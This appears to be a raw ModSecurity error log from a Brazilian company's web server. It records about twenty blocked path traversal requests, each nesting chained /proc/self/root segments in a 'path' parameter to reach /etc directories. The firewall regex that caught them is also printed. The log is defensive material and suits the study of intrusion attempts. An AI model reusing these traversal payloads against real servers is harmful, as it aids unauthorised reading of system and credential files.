[Mon Mar 16 19:13:05.262887 2026] [:error] [pid 29507:tid 140411616036608] [client 74.7.241.46:40108] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAcUr9dMAiw-8KANNskAAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:13:09.879248 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.241.46:40112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAdaTCbgAP5jq5TehO0AAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:13:12.472573 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.241.46:39734] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAeKQpVkWug9HeOt9XewAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:13:13.781964 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:39744] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAebABkC4fWIHEf8Ec8gAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:13:17.280011 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:39758] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAfbysWC90G-1nBrBpzQAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:13:19.732006 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:39778] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAf_9ocpUE4ed4uDwXSwAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:13:35.147723 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:39780] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAj_9ocpUE4ed4uDwXWwAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:13:39.467641 2026] [:error] [pid 29802:tid 140411548894976] [client 74.7.241.46:49398] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAk8_BxrYCr4hPDw8OIQAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:13:40.767485 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.241.46:52322] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAlLABkC4fWIHEf8Ec9gAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:13:41.508586 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.243.203:48070] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAlaTCbgAP5jq5TehO7wAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:13:41.959602 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.241.46:52334] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAlbysWC90G-1nBrBp0gAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:13:44.315420 2026] [:error] [pid 29802:tid 140411699963648] [client 74.7.241.46:52346] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAmM_BxrYCr4hPDw8OJwAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:13:53.467835 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.243.203:60112] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAobysWC90G-1nBrBp3AAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:13:58.176218 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.243.203:38386] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiApqTCbgAP5jq5TehO-wAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:13:58.371062 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.241.46:52360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiApqQpVkWug9HeOt9XigAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:13:59.715335 2026] [:error] [pid 29802:tid 140411741927168] [client 74.7.241.46:44340] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAp8_BxrYCr4hPDw8OKwAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:14:09.399567 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.243.203:38400] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAsaTCbgAP5jq5TehPCAAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Mon Mar 16 19:14:16.401877 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.241.46:44348] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAuLysWC90G-1nBrBp7AAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:14:17.743326 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.241.46:48600] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAudSswJuvopo3lOiE2AAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:14:19.017822 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.241.46:55154] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAu7ABkC4fWIHEf8EdAQAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:14:32.650635 2026] [:error] [pid 15061:tid 140411565680384] [client 74.7.241.46:55156] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAx6TCbgAP5jq5TehPGAAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
